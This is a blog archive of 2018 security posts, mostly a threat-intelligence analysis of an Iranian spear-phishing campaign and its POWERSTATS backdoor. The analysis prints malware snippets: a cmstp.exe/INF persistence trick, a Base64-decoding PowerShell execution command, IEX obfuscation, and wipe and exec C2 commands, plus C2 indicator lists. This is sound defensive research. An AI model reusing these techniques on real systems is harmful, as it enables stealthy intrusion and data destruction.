Monthly Archives: March 2018

Idle Threats Or a Harbinger of Things to Come?

According to recent reporting, a suspected nation state hacker group with alleged ties to the Iranian government issued death threats to researchers that had detected their cyber espionage activity.  The researchers were checking a server that they believed to be associated with a specific data breach when they received the message “Stop!!! I Kill You Researcher.”  According to the same report, the server was apparently attached to the attackers’ command-and-control infrastructure.  Active since 2015, the group known as “MuddyWaters” has been observed targeting organizations in Georgia, India, Iraq, Pakistan, Saudi Arabia, Tajikistan, Turkey, and the United States.  Recently, MuddyWaters has been observed targeting oil and gas entities in the Middle East.  Notably, the group is believed to employ “false flag” operations – similar to what was believed to have been done during the recent Olympics – in which it adopted some of the tactics, techniques, and procedures (TTP) of suspected Chinese hackers to obfuscate the group’s true identity.

 

On the surface, the threat made against the researchers can be viewed as knee-jerk reaction to being tracked by the private sector.  But this does raise the possibility of what hostile actors may resort to in the future.  The private sector computer security has been aggressively investigating the activities of suspected nation states actors since 2004 when the first report published the activities of a Chinese state entity.  Since that time, several subsequent reports have been provided to the public detailing “advanced persistent threat” operations detailing TTPs and targeting that have ultimately been attributed to specific nation state actors.  While the standard public reaction of these governments has been to refute or deny the claims, citing the difficulties in providing adequate evidence that supports attribution, sanctions and alleged retaliatory strikes have been know to occur as a result of these accusations.

 

The potential of escalatory cyber strikes in response to actions is a real concern and one that has been raised in the press.  One reason the United States, for example, has not retaliated against suspected Russian involvement in the 2016 U.S. presidential election is not knowing how such an adversary may reciprocate any retaliatory strike against its interests.  This is a very legitimate concern, as cyberspace activities are still relatively new, and that nation states around the world are eagerly trying to buy, develop, or acquire an offensive cyber capability.

 

And this is where thinking may be too narrowly focused.  A state or non-state entity does not have to resort to cyberspace to retaliate against an attack that it has suffered in cyberspace.  It is not a one-for-one arrangement.  Threatening to retaliate in the physical world provides another potential attack vector that needs to be considered.  After all, many of the vendor APT reports that are published often contain the names of those involved in the report – individuals that likely have a footprint on the Internet. These attackers can find out their personal identifiable information and either post it for others to target, or else use it for their own purposes.  Doxxing – or disclosing the PII of victims – has long been a weapon in the hacktivist arsenal.  In 2016, the United Cyber Caliphate published “kill lists” of U.S. military personnel to encourage ISIS sympathizers and lone wolfs to commit acts of violence against them.  Although to date, there is no known attack resulting from disclosures such as this, it bears noting if that may transpire in the future.

 

Nation states have been suspected of carrying out physical attacks on specific individuals. Recently, a Russian spy is believed to have been poisoned at the behest of the Russian government. In 2017, suspected North Korean agents used poison on Kim Jong Un’s brother at a Malaysian airport. Granted, these attacks weren’t the result of cyber activity, but it does demonstrate that the capability is there if the intent is present.  Giving the fact that Iran is largely considered the world’s leading nation state supporter of terrorism, it has a large network of agents to call upon to target individuals it may view as threatening to their interests.  Iran has been suspected of conducting “assassinations” in the past, a claim that it has denied.

 

For the time being, this appears to be a one-time threat.  But how nation states respond to cyber attacks and significant cyber incidents can influence on what accused governments may do in response to any retaliation.  Let’s hope that this confluence between cyber space and the physical world remain theoretical and not a harbinger of things to come.

 

This is a guest post written by Emilio Iasiello

The post Idle Threats Or a Harbinger of Things to Come? appeared first on cyberdb.co.

EGYPT LAUNCHES NEW DIGITAL FORENSICS LAB



IN BRIEF: The Government of Egypt has announced that it is setting up a specialized digital forensic lab for Intellectual Property as part of its enforcement schemes of combating software piracy.

---------------------------------------

The new lab, the first of its kind in the MENA region, is mainly designed to resolve business software and internet-based piracy cases. It authentically recovers data from digital devices and unearths new fraud techniques.


The latest measures applied aim to enhance the investigative capabilities and ease the digital forensic evidence acquisition, analysis, and reporting.


The cutting-edge techniques and latest technologies employed in the lab devise a road-map for judges, prosecutors, and lawyers. The practiced procedures enable them to distinguish the counterfeit products from the genuine and manage the intellectual property and digital piracy issues at hand.

The Information Technology Industry Development Agency – developing the IT industry in Egypt, hosts the lab at its premises. The agency is the executive IT arm of the Egyptian ICT ministry to enforce IPR related to software products and databases.

“Over the last couple of years, ITIDA’s IPR office has undertaken comprehensive actions to increase IP enforcement with all the stakeholders like the economic courts; i.e., judges and prosecutors, police officers, and copyright owners," said Dr. Mohamed Hegazy, Egypt’s IPR Office Manager.

Aiming at developing the necessary skills, the fully dedicated IPR office has delivered extensive training and capacity-building programs in legal, technical and practical aspects during 2017 to more than 900 police officers, 97 journalists from the National Broadcasting Authority, 125 employees from different software companies, in addition to 473 judges and prosecutors in the economic courts.



-------------------------------
UPDATES: I took part to the concluded Intelligence strategies & crime prevention for law enforcers meeting held in South Africa - Among others, I emphasized on search warrant, Chain of custody, to document everything during forensics investigation & Proper handling of Digital evidences
Digital evidence, by its very nature, is fragile and can be altered, damaged, or destroyed by improper handling or examination - this may render it unusable or lead to an inaccurate conclusion.
-------------------------------

“We are committed to sustaining our success in combating IP infringement and expanding IP rights. The launch of this lab enables us to achieve our targets”. “Only in 2017, we have delivered technical expertise reports of 96 cases to the economic courts, registered 203 computer software programs and issued 267 licenses for the first time.”, Hegazy added.

According to the latest BSA-IDC Global Software Piracy Study in 2016, the Egyptian piracy rate reached 61%, a ratio lower than most of competing countries and leading global outsourcing locations including Morocco (65 percent), the Philippines (67 percent) and Vietnam (78 percent).

The Cabinet is preparing a data protection and privacy law draft. It has already agreed on cyber-crime law and awaits the Parliament’s approval to be enacted, according to Egypt’s state media.

Egypt is currently undergoing an unprecedented phase of development in all fields, which is largely attributed to sound policies, monetary reforms, and global partnerships.

With the sustained momentum that Egypt is gaining in the area of tech innovation and startups ecosystem maturity, the Egyptian government represented by the Ministry of ICT has put its free and open software strategy into action in 2016.

The newly adopted policy represents a paradigm shift in intellectual property rules as it provides an alternate software-licensing model while developing a healthy eco-system for software production and innovation.

Best Cyber Security Twitter Profiles to Follow 2018

Twitter has always been a great place to stay in touch with the latest cybersecurity trends. It is a great way to join professionals and even experts that normally you wouldn’t be able to reach out. You can follow them, read their posts and comments daily and why not even tagging them in your tweets to attract their attention just in a few seconds. Twitter is an open source platform that stimulates people to share knowledge from new technologies or threats to silly pictures and memes about the latest events in the news.

However, there are thousands of profiles that you can follow, but sometimes you just don’t seem to find exactly what you are looking for. The question of which security experts to follow on Twitter is tricky since there are so many professionals out there who keep sharing valuable information and news on a daily basis. What really matters is to decide what is relevant to you and how you are going to use it as your advantage.  Once you have decided who to follow you can create your own lists per category containing the best Cyber Security Twitter profiles. This option allows you to see all of the tweets in a simple way and you will make sure that you don’t miss a single tweet from your feed.

We have created a list with some of the best Twitter CyberSecurity accounts so you don’t waste your time in searching – you can follow them right away.

List of Best Twitter Cybersecurity Accounts You Should Follow 2018

Cybersecurity magazines and websites

  1. Infosecurity MagInfosecurity Mag Logo

A great cybersecurity magazine that provides critical information to businesses. If you have your own business and want to keep it secure, you should definitely follow Infosecurity Mag.

  1. Security Affairs/Pierluigi PaganiniSecurity Affairs/Pierluigi Paganini

Pierluigi is the founder of this blog which is connected to social networks security, cyber warfare and hacktivists.

  1. The Hacker NewsThe Hacker News

One of the most trusted source of cyber security news. It is oriented to hackers, researchers, technologists and geeks. The magazine covers anything related to security on a daily basis.

  1. HackreadHackRead.com

This magazine brings together the best hacking, Infosec, tech and social media news. A great plate to learn more about cybercrime, surveillance and privacy.

  1. CSO OnlineCSOonline

Another great cyber security platform that is a must-follow. They research various topics related to online threats which emerge on a daily basis. CSO Online tweet mostly their own content, which is just excellent and written professionally.

  1. Security Week Security Week

It is a very famous news website within the cyber security industry. Security Week distinguishes itself as the editors use more technical approach. The Twitter account of the website is updated frequently and they always know the latest info on cyber threats.

  1. Dark ReadingDark Reading

It’s an online security website made by cyber security experts and aimed at a similar audience.

  1. HelpNet SecurityHelp Net Security

This website has a huge contributor base coming from different industries. They give the reader a more comprehensive view on how to deal with cyber threats and issues.

  1. US-CERTUS-CERT

The US Computer Emergency Readiness Team is helping with the fight against cybercrime and threats.

  1. PeerlystPeerlyst

Peerlyst is a large community of security professionals that want to solve challenges related to information security together. They want to build the largest database of free security knowledge.

Cybersecurity Influencers to follow:

  1. Eugene KasperskyEugene Kaspersky

Mr. Kaspersky doesn’t need an introduction. He is one of the leaders in the industry and writes his own opinions and views on cyber security.

  1. Troy HuntTroy Hunt

Troy is an executive of Microsoft and deals with product security. He has created HaveIBeenPwned.com where users can check if their e-mails have been compromised in a data breach.

  1. Brian KrebsBrian Krebs

He is a top security reporters always on the go when the latest security breach occurs.

  1. Jeremiah GrossmanJeremiah Grossman

An industry expert that offers security advices to individuals and companies worldwide.

  1. Bruce SchneierBruce Schneier

He has published many books and articles related to the cyber security and has been labeled as a security guru.

  1. Miko HypponenMiko Hypponen

One of the top researchers in the online security industry. You can find the newest types of scams and practical advice on his Twitter profile.

The post Best Cyber Security Twitter Profiles to Follow 2018 appeared first on cyberdb.co.

Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign

Introduction

From January 2018 to March 2018, through FireEye’s Dynamic Threat Intelligence, we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East.

We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. The spear phishing emails and attached malicious macro documents typically have geopolitical themes. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS.

One of the more interesting observations during the analysis of these files was the re-use of the latest AppLocker bypass, and lateral movement techniques for the purpose of indirect code execution. The IP address in the lateral movement techniques was substituted with the local machine IP address to achieve code execution on the system.

Campaign Timeline

In this campaign, the threat actor’s tactics, techniques and procedures (TTPs) shifted after about a month, as did their targets. A brief timeline of this activity is shown in Figure 1.


Figure 1: Timeline of this recently observed spear phishing campaign

The first part of the campaign (From Jan. 23, 2018, to Feb. 26, 2018) used a macro-based document that dropped a VBS file and an INI file. The INI file contains the Base64 encoded PowerShell command, which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe. The process chain is shown in Figure 2.


Figure 2: Process chain for the first part of the campaign

Although the actual VBS script changed from sample to sample, with different levels of obfuscation and different ways of invoking the next stage of process tree, its final purpose remained same: invoking PowerShell to decode the Base64 encoded PowerShell command in the INI file that was dropped earlier by the macro, and executing it. One such example of the VBS invoking PowerShell via MSHTA is shown in Figure 3.


Figure 3: VBS invoking PowerShell via MSHTA

The second part of the campaign (from Feb. 27, 2018, to March 5, 2018) used a new variant of the macro that does not use VBS for PowerShell code execution. Instead, it uses one of the recently disclosed code execution techniques leveraging INF and SCT files, which we will go on to explain later in the blog.

Infection Vector

We believe the infection vector for all of the attacks involved in this campaign are macro-based documents sent as an email attachment. One such email that we were able to obtain was targeting users in Turkey, as shown in Figure 4:


Figure 4: Sample spear phishing email containing macro-based document attachment

The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey, Pakistan, Tajikistan and India. What follows is four examples, and a complete list is available in the Indicators of Compromise section at the end of the blog.

Figure 5 shows a document purporting to be from the National Assembly of Pakistan.


Figure 5: Document purporting to be from the National Assembly of Pakistan

A document purporting to be from the Turkish Armed Forces, with content written in the Turkish language, is shown in Figure 6.


Figure 6: Document purporting to be from the Turkish Armed Forces

A document purporting to be from the Institute for Development and Research in Banking Technology (established by the Reserve Bank of India) is shown in Figure 7.


Figure 7: Document purporting to be from the Institute for Development and Research in Banking Technology

Figure 8 shows a document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan.


Figure 8: Document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan

Each of these macro-based documents used similar techniques for code execution, persistence and communication with the command and control (C2) server.

Indirect Code Execution Through INF and SCT

This scriptlet code execution technique leveraging INF and SCT files was recently discovered and documented in February 2018. The threat group in this recently observed campaign – TEMP.Zagros – weaponized their malware using the following techniques.

The macro in the Word document drops three files in a hard coded path: C:\programdata. Since the path is hard coded, the execution will only be observed in operating systems, Windows 7 and above. The following are the three files:

  • Defender.sct – The malicious JavaScript based scriptlet file.
  • DefenderService.inf – The INF file that is used to invoke the above scriptlet file.
  • WindowsDefender.ini – The Base64 encoded and obfuscated PowerShell script.

After dropping the three files, the macro will set the following registry key to achieve persistence:

\REGISTRY\USER\SID\Software\Microsoft\Windows\CurrentVersio
   n\Run\"WindowsDefenderUpdater"
= cmstp.exe /s c:\programdata\DefenderService.inf

Upon system restart, cmstp.exe will be used to execute the SCT file indirectly through the INF file. This is possible because inside the INF file we have the following section:

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,c:/programdata/Defender.sct

That section gets indirectly invoked through the DefaultInstall_SingleUser section of INF, as shown in Figure 9.


Figure 9: Indirectly invoking SCT through the DefaultInstall_SingleUser section of INF

This method of code execution is performed in an attempt to evade security products. FireEye MVX and HX Endpoint Security technology successfully detect this code execution technique.

SCT File Analysis

The code of the Defender.sct file is an obfuscated JavaScript. The main function performed by the SCT file is to Base64 decode the contents of WindowsDefender.ini file and execute the decoded PowerShell Script using the following command line:

powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\WindowsDefender.ini)

The rest of the malicious activities are performed by the PowerShell Script.

PowerShell File Analysis

The PowerShell script employs several layers of obfuscation to hide its actual functionality. In addition to obfuscation techniques, it also has the ability to detect security tools on the analysis machine, and can also shut down the system if it detects the presence of such tools.

Some of the key obfuscation techniques used are:

  • Character Replacement: Several instances of character replacement and string reversing techniques (Figure 10) make analysis difficult.


Figure 10: Character replacement and string reversing techniques

  • PowerShell Environment Variables: Nowadays, malware authors commonly mask critical strings such as “IEX” using environment variables. Some of the instances used in this script are:
    • $eNv:puBLic[13]+$ENv:pUBLIc[5]+'x'
    • ($ENV:cOMsPEC[4,26,25]-jOin'')
  • XOR encoding: The biggest section of the PowerShell script is XOR encoded using a single byte key, as shown in Figure 11.


Figure 11: PowerShell script is XOR encoded using a single byte key

After deobfuscating the contents of the PowerShell Script, we can divide it into three sections.

Section 1

The first section of the PowerShell script is responsible for setting different key variables that are used by the remaining sections of the PowerShell script, especially the following variables:

  • TEMpPAtH = "C:\ProgramData\" (the path used for storing the temp files)
  • Get_vAlIdIP = https://api.ipify.org/ (used to get the public IP address of the machine)
  • FIlENAmePATHP = WindowsDefender.ini (file used to store Powershell code)
  • PRIVAtE = Private Key exponents
  • PUbLIc = Public Key exponents
  • Hklm = "HKLM:\Software\"
  • Hkcu = "HKCU:\Software\"
  • ValuE = "kaspersky"
  • SYSID
  • DrAGon_MidDLe = [array of proxy URLs]

Among those variables, there is one variable of particular interest, DrAGon_MidDLe, which stores the list of proxy URLs (detailed at the end of the blog in the Network Indicators portion of the Indicators of Compromise section) that will be used to interact with the C2 server, as shown in Figure 12.


Figure 12: DrAGon_MidDLe stores the list of proxy URLs used to interact with C2 server

Section 2

The second section of the PowerShell script has the ability to perform encryption and decryption of messages that are exchanged between the system and the C2 server. The algorithm used for encryption and decryption is RSA, which leverages the public and private key exponents included in Section 1 of the PowerShell script.

Section 3

The third section of the PowerShell script is the biggest section and has a wide variety of functionalities.

During analysis, we observed a code section where a message written in Chinese and hard coded in the script will be printed in the case of an error while connecting to the C2 server:

The English translation for this message is: “Cannot connect to website, please wait for dragon”.

Other functionalities provided by this section of the PowerShell Script are as follows:

  • Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables:
    • IP Address from Network Adapter Configuration
    • OS Name
    • OS Architecture
    • Computer Name
    • Computer Domain Name
    • Username

All of this data is concatenated and formatted as shown in Figure 13:


Figure 13: Concatenated and formatted data retrieved by PowerShell script

  • Register the victim’s machine to the C2 server by sending the REGISTER command to the server. In response, if the status is OK, then a TOKEN is received from the C2 server that is used to synchronize the activities between the victim’s machine and the C2 server.

While sending to the C2 server, the data is formatted as follows:

@{SYSINFO  = $get.ToString(); ACTION = "REGISTER";}

  • Ability to take screenshots.
  • Checks for the presence of security tools (detailed in the Appendix) and if any of these security tools are discovered, then the system will be shut down, as shown in Figure 14.


Figure 14: System shut down upon discovery of security tools

  • Ability to receive PowerShell script from the C2 server and execute on the machine. Several techniques are employed for executing the PowerShell code:
    • If command starts with “excel”, then it leverages DDEInitiate Method of Excel.Appilcation to execute the code: 
    • If the command starts with “outlook”, then it leverages Outlook.Application and MSHTA to execute the code: 
    • If the command starts with “risk”, then execution is performed through DCOM object: 
  • File upload functionality.
  • Ability to disable Microsoft Office Protected View (as shown in Figure 15) by setting the following keys in the Windows Registry:
    • DisableAttachmentsInPV
    • DisableInternetFilesInPV
    • DisableUnsafeLocationsInPV


Figure 15: Disabling Microsoft Office Protected View

  • Ability to remotely reboot or shut down or clean the system based on the command received from the C2 server, as shown in Figure 16.


Figure 16: Reboot, shut down and clean commands

  • Ability to sleep for a given number of seconds.

The following table summarizes the main C2 commands supported by this PowerShell Script.

C2 Command

Purpose

reboot

Reboot the system using shutdown command

shutdown

Shut down the system using shutdown command

clean

Wipe the Drives, C:\, D:\, E:\, F:\

screenshot

Take a screenshot of the System

upload

Encrypt and upload the information from the system

excel

Leverage Excel.Application COM object for code execution

outlook

Leverage Outlook.Application COM object for code execution

risk

Leverage DCOM object for code execution

Conclusion

This activity shows us that TEMP.Zagros stays up-to-date with the latest code execution and persistence mechanism techniques, and that they can quickly leverage these techniques to update their malware. By combining multiple layers of obfuscation, they deter the process of reverse engineering and also attempt to evade security products.

Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

Indicators of Compromise

Macro based Documents and Hashes

SHA256 Hash

Filename

Targeted Region

eff78c23790ee834f773569b52cddb01dc3c4dd9660f5a476af044ef6fe73894

na.doc

 

Pakistan

76e9988dad0278998861717c774227bf94112db548946ef617bfaa262cb5e338

Invest in Turkey.doc

Turkey

6edc067fc2301d7a972a654b3a07398d9c8cbe7bb38d1165b80ba4a13805e5ac

güvenlik yönergesi. .doc

Turkey

009cc0f34f60467552ef79c3892c501043c972be55fe936efb30584975d45ec0

idrbt.doc

 

India

18479a93fc2d5acd7d71d596f27a5834b2b236b44219bb08f6ca06cf760b74f6

Türkiye Cumhuriyeti Kimlik Kartı.doc

Turkey

3da24cd3af9a383b731ce178b03c68a813ab30f4c7c8dfbc823a32816b9406fb

Turkish Armed Forces.doc

 

Turkey

9038ba1b7991ff38b802f28c0e006d12d466a8e374d2f2a83a039aabcbe76f5c

na.gov.pk.doc

 

Pakistan

3b1d8dcbc8072b1ec10f5300c3ea9bb20db71bd8fa443d97332790b74584a115

MVD-FORM-1800.doc

Tajikistan

cee801b7a901eb69cd166325ed3770daffcd9edd8113a961a94c8b9ddf318c88

KEGM-CyberAttack.doc

Turkey

1ee9649a2f9b2c8e0df318519e2f8b4641fd790a118445d7a0c0b3c02b1ba942

IL-1801.doc

Turkey

aa60c1fae6a0ef3b9863f710e46f0a7407cf0feffa240b9a4661a4e8884ac627

kiyiemniyeti.doc

Turkey

93745a6605a77f149471b41bd9027390c91373558f62058a7333eb72a26faf84

TCELL-S1-M.doc

Tajikistan

c87799cce6d65158da97aa31a5160a0a6b6dd5a89dea312604cc66ed5e976cc9

egm-1.doc

Turkey

2cea0b740f338c513a6390e7951ff3371f44c7c928abf14675b49358a03a5d13

Connectel .pk.doc

Pakistan

18cf5795c2208d330bd297c18445a9e25238dd7f28a1a6ef55e2a9239f5748cd

gßvenlik_yÜnergesi_.doc

Turkey

153117aa54492ca955b540ac0a8c21c1be98e9f7dd8636a36d73581ec1ddcf58

MIT.doc

Turkey

d07d4e71927cab4f251bcc216f560674c5fb783add9c9f956d3fc457153be025

Gvenlik Ynergesi.doc

Turkey

af5f102f0597db9f5e98068724e31d68b8f7c23baeea536790c50db587421102

Gvenlik Ynergesi.doc

Turkey

5550615affe077ddf66954edf132824e4f1fe16b3228e087942b0cad0721a6af

NA

Turkey

3d96811de7419a8c090a671d001a85f2b1875243e5b38e6f927d9877d0ff9b0c

Anadolu Güneydoğu Projesinde .doc

Turkey

Network Indicators

List of Proxy URLs

hxxp://alessandrofoglino[.]com//db_template.php

hxxp://www.easy-home-sales[.]co.za//db_template.php

hxxp://www.almaarefut[.]com/admin/db_template.php

hxxp://chinamall[.]co.za//db_template.php

hxxp://amesoulcoaching[.]com//db_template.php

hxxp://www.antigonisworld[.]com/wp-includes/db_template.php

hxxps://anbinni.ba/wp-admin/db_template.php

hxxp://arctistrade[.]de/wp/db_template.php

hxxp://aianalytics[.]ie//db_template.php

hxxp://www.gilforsenate[.]com//db_template.php

hxxp://mgamule[.]co.za/oldweb/db_template.php

hxxp://chrisdejager-attorneys[.]co.za//db_template.php

hxxp://alfredocifuentes[.]com//db_template.php

hxxp://alxcorp[.]com//db_template.php

hxxps://www.aircafe24[.]com//db_template.php

hxxp://agencereferencement.be/wp-admin/db_template.php

hxxp://americanlegacies[.]org/webthed_ftw/db_template.php

hxxps://aloefly[.]net//db_template.php

hxxp://www.duotonedigital[.]co.za//db_template.php

hxxp://architectsinc[.]net//db_template.php

hxxp://www.tanati[.]co.za//db_template.php

hxxp://emware[.]co.za//db_template.php

hxxp://breastfeedingbra[.]co.za//db_template.php

hxxp://alhidayahfoundation[.]co[.]uk/category/db_template.php

hxxp://cashforyousa[.]co.za//db_template.php

hxxps://www.airporttaxi-uk[.]co[.]uk/wp-includes/db_template.php

hxxp://antjetaubert[.]de//db_template.php

hxxp://hesterwebber[.]co.za//db_template.php

hxxp://fickstarelectrical[.]co.za//db_template.php

hxxp://alex-frost[.]com/assets/db_template.php

hxxps://americanbrasil[.]com.br//db_template.php

hxxps://aileeshop[.]com//db_template.php

hxxps://annodle[.]com//db_template.php

hxxp://goldeninstitute[.]co.za/contents/db_template.php

hxxp://ednpk[.]com//db_template.php

hxxp://www.arabiccasinochoice[.]com//db_template.php

hxxp://proeventsports[.]co.za//db_template.php

hxxp://glenbridge[.]co.za//db_template.php

hxxp://berped[.]co.za//db_template.php

hxxp://best-digital-slr-cameras[.]com//db_template.php

hxxp://antonhirvonen[.]com/pengalandet.se/wp-includes/db_template.php

hxxp://www.alpacal[.]com//db_template.php

hxxps://www.alakml[.]com/wp-admin/db_template.php

hxxp://ar-rihla[.]com//db_template.php

hxxp://appsvoice[.]info//db_template.php

hxxp://www.bashancorp[.]co.za//db_template.php

hxxp://alexanderbecker[.]net/services/db_template.php

hxxp://visionclinic.co.ls/visionclinic/db_template.php

hxxps://www.angelesrevista[.]com//db_template.php

hxxps://www.antojoentucocina[.]com//db_template.php

hxxp://apollonweb[.]com//db_template.php

hxxps://www.alphapixa[.]com//db_template.php

hxxp://capitalradiopetition[.]co.za//db_template.php

hxxp://www.generictoners[.]co.za//db_template.php

hxxps://alnahdatraining[.]com//db_template.php

hxxps://albousala[.]com//db_template.php

hxxps://www.dopetroleum[.]com//db_template.php

hxxp://bios-chip[.]co.za//db_template.php

hxxp://www.crissamconsulting[.]co.za//db_template.php

hxxp://capriflower[.]co.za//db_template.php

hxxp://www.dingaanassociates[.]co.za//db_template.php

hxxp://indiba-africa[.]co.za//db_template.php

hxxp://verifiedseller[.]co.za/js/db_template.php

hxxps://www.buraqlubricant[.]com//db_template.php

hxxp://aqarco[.]com/wp-admin/db_template.php

hxxp://allaboutblockchain[.]net//db_template.php

hxxp://www.amexcars[.]info/tpl/db_template.php

hxxp://clandecor[.]co.za/rvsUtf8Backup/db_template.php

hxxp://bakron[.]co.za//db_template.php

hxxp://gsnconsulting[.]co.za//db_template.php

hxxp://vumavaluations[.]co.za//db_template.php

hxxp://heritagetravelmw[.]com//db_template.php

hxxp://ampvita[.]com//db_template.php

hxxp://ahero-resource-center[.]org/administrator/db_template.php

hxxps://arbulario[.]com//db_template.php

hxxp://havilahglo[.]co.za/wpscripts/db_template.php

hxxp://www.bestdecorativemirrors[.]com/More-Mirrors/db_template.php

hxxp://delectronics[.]com[.]pk//db_template.php

hxxp://antucomp[.]com//db_template.php

hxxp://advocatetn[.]com/font-awesome/fonts/db_template.php

hxxps://amooy[.]com/webservice/db_template.php

hxxp://www.harmonyguesthouse[.]co.za//db_template.php

hxxp://alanrori[.]com//db_template.php

hxxp://algarvesup[.]com//db_template.php

hxxp://desirablehair[.]co.za//db_template.php

hxxp://comsip[.]org.mw//db_template.php

hxxp://jdcorporate[.]co.za/catalog/db_template.php

hxxp://andrewfinnburhoe[.]com//db_template.php

hxxp://anyeva[.]com/wp-includes/db_template.php

hxxp://www.agenceuhd[.]com//db_template.php

hxxp://host4unix[.]net/host24new/db_template.php

hxxp://www.altaica[.]ca/wordpress/db_template.php

hxxp://www.allbuyer[.]co[.]uk//db_template.php

hxxp://jvpsfunerals[.]co.za//db_template.php

hxxp://immaculatepainters[.]co.za//db_template.php

hxxp://tcpbereka[.]co.za/js/db_template.php

hxxp://clientcare.co.ls//db_template.php

hxxp://investaholdings[.]co.za/htc/db_template.php

hxxp://www.amjobs[.]co[.]uk//db_template.php

hxxp://www.agirlgonewine[.]com/store/db_template.php

hxxp://findinfo-more[.]com//db_template.php

hxxp://asgen[.]org//db_template.php

hxxp://alphasalesrecruitment[.]com//db_template.php

hxxp://irshadfoundation[.]co.za//db_template.php

hxxp://analternatif[.]com/includes/db_template.php

hxxp://arbruisseau[.]com/profiles/db_template.php

hxxp://ladiescircle[.]co.za//db_template.php

hxxp://all-reseller[.]com/zzz_backup/db_template.php

hxxp://alcatrazmoon[.]com/images/db_template.php

hxxp://www.alcalumni[.]com/wp-includes/db_template.php

hxxp://aniljoseph[.]com/servermon/db_template.php

hxxp://alwake3press[.]com/wp-includes/db_template.php

hxxp://www.hfhl[.]org.ls/habitat/db_template.php

hxxp://alcafricanos[.]com/slsmonographs/db_template.php

hxxps://agapeencounter[.]org//db_template.php

hxxp://apobiomedix[.]ca//db_template.php

hxxp://anythinglah[.]info//db_template.php

hxxp://aniroleplay[.]net//db_template.php

hxxp://www.allcopytoners[.]com//db_template.php

hxxp://alphaobring[.]com//db_template.php

hxxp://www.galwayprimary[.]co.za//db_template.php

hxxp://alnuzha[.]org/en/db_template.php

hxxps://ancient-wisdoms[.]com//db_template.php

hxxp://amazingenergysavings[.]net//db_template.php

hxxp://gvs[.]com[.]pk/font-awesome/db_template.php

hxxp://geetransfers[.]co.za/font-awesome/db_template.php

hxxp://carlagrobler[.]co.za/components/db_template.php

hxxp://amazingashwini[.]com//db_template.php

hxxp://aminearserver[.]es//db_template.php

hxxp://lensofafrica[.]co.za//db_template.php

hxxp://greenacrestf[.]co.za/video/db_template.php

hxxp://www.tonaro[.]co.za//db_template.php

hxxp://alephit2[.]biz/kitzz/db_template.php

hxxp://lppaportal[.]org.ls//db_template.php

hxxp://alkousy[.]com//db_template.php

hxxp://ambulatorioveterinariocalusco[.]com/img/common/db_template.php

hxxp://fragranceoil[.]co.za//db_template.php

hxxp://www.eloquent[.]co.za/nweb2/db_template.php

hxxp://chrishanicdc[.]org/wpimages/db_template.php

hxxp://ahc.me[.]uk//db_template.php

hxxp://www.britishasia-equip[.]co[.]uk//db_template.php

hxxp://always-beauty[.]ch//db_template.php

hxxps://www.ancamamara[.]com/wp-admin/db_template.php

hxxp://entracorntrading[.]co.za//db_template.php

hxxp://www.alexjeffersonconsulting[.]com/wp-includes/db_template.php

hxxp://americabr[.]com.br//db_template.php

hxxp://andrew-snyder[.]net/bootstrap/db_template.php

hxxp://signsoftime[.]co.za//db_template.php

hxxp://aperta-armis[.]org//db_template.php

hxxp://absfinancialplanning[.]co.za/images/db_template.php

hxxp://charispaarl[.]co.za//db_template.php

hxxp://indlovusecurity[.]co.za//db_template.php

hxxp://alcafricandatalab[.]com//db_template.php

hxxp://amor-clubhotels[.]com//db_template.php

hxxp://mokorotlocorporate[.]com//db_template.php

hxxp://apppriori[.]com//db_template.php

hxxp://luxconprojects[.]co.za//db_template.php

hxxp://androidphonetips[.]com/wp-includes/db_template.php

hxxp://angel-seeds[.]com.ua/catalog/db_template.php

hxxp://alissanicolai[.]com/assets/db_template.php

hxxps://www.amateurastronomy[.]org//db_template.php

hxxp://aiofotoevideo[.]com//db_template.php

hxxp://www.amika.hr//db_template.php

hxxp://comfortex[.]co.za/php/db_template.php

hxxp://deepgraphics[.]co.za//db_template.php

hxxps://agiledepot[.]com//db_template.php

hxxp://almatours[.]gr//db_template.php

hxxp://analystcnwang[.]com//db_template.php

hxxp://www.malboer[.]co.za/trendy1/db_template.php

hxxp://sefikengfarm.co.ls//db_template.php

hxxp://www.antirughenaturale[.]com/wp-admin/db_template.php

hxxp://passright[.]co.za//db_template.php

hxxp://seismicfactory[.]co.za//db_template.php

hxxp://alessandroalessandrini[.]it//db_template.php

hxxps://aquabsafe[.]com//db_template.php

hxxp://amatikulutours[.]com/tmp/db_template.php

hxxp://ganitis[.]gr//db_template.php

hxxp://aleenasgiftbox[.]com/admin/db_template.php

hxxps://allusdoctors[.]com/themes/db_template.php

hxxp://alainsaffel[.]com//db_template.php

hxxp://www.ariehandomri[.]com//db_template.php

hxxp://aquaneeka[.]co[.]uk/wp-includes/db_template.php

hxxp://itengineering[.]co.za/gatewaydiamond/db_template.php

hxxp://alldomains-crm[.]com/bubblegumpopcorn[.]com/wp-admin/db_template.php

hxxp://www.albertamechanical[.]ca//db_template.php

hxxp://alchamel[.]info//db_template.php

hxxps://almokan[.]net/wp-includes/db_template.php

hxxp://jakobieducation[.]co.za//db_template.php

hxxps://arc-sec[.]net//db_template.php

hxxp://ldams[.]org.ls/supplies/db_template.php

hxxp://menaboracks[.]co.za/tmp/db_template.php

hxxp://www.getcord[.]co.za//db_template.php

hxxp://boardaffairs[.]com//db_template.php

hxxp://capetownway[.]co.za//db_template.php

hxxp://cloudhostdesign[.]com//db_template.php

hxxp://hartenboswaterpark[.]co.za/templates/db_template.php

hxxp://fccorp[.]co.za/php/db_template.php

hxxp://angar68[.]com//db_template.php

hxxp://www.dws-gov[.]co.za//db_template.php

hxxp://alwahahweb[.]com//db_template.php

